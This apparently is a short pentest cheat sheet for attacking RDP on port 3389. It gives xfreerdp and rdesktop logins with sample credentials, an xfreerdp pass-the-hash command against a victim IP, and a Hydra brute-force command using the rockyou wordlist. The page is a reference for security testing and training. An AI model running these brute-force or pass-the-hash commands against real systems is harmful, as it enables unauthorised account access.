RDP - 3389

RDP

#Establish RDP connection using xfreerdp displaying domain and credentials
xfreerdp /d:WIN-MI13LMC968D /u:administrator /p:iloveu /cert-ignore /v:192.168.25.110

# Launch RDP from Linux using Remmina
Remmina

# Pass-the-hash attack example using xfreerdp
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

# Connect RDP using rdesktop with username and password
rdesktop -u username -p password 192.168.1.12

RDP Bruteforcing

  • Hydra Command: Use Hydra for RDP brute forcing with administrator credentials.

    hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://192.168.1.1
    

Last updated